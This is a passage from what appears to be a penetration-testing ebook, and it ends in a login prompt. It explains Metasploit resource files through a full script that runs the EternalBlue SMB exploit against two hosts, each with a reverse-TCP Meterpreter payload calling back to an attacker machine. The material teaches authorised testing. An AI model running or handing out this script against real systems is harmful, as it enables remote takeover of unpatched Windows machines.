Exploiting multiple targets using MSF resource files

MSF resource files are basically line-separated text files that include a sequence of commands that need to be executed in msfconsole. Let's go ahead and create a resource file that can exploit the same vulnerability on multiple hosts:

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.0.166
set lhost 192.168.0.137
set lport 4444
exploit -j
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.0.119
set lhost 192.168.0.137
set lport 4442
exploit -j

Save the file as doublepulsar.rc. Now you are ready to invoke the resource file by running msfconsole -r filename.rc, where -r refers to the resource file. The preceding resource file will exploit the same vulnerability sequentially. Once the first exploit is complete, the specification of exploit -j will move the running exploit to the background, allowing the next exploit to proceed. Once all of the targets' exploitation is complete, we should be able to see multiple Meterpreter shells available in Metasploit.

If the exploit is designed to run only on one host, it may not be possible to enter multiple hosts or IP ranges to the exploit. However, the alternative is to run the same exploit with different lport numbers per host. We will be discussing more on pre-existing MSF resource files that can be utilized while escalating privileges in the next chapter.
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.116.63.236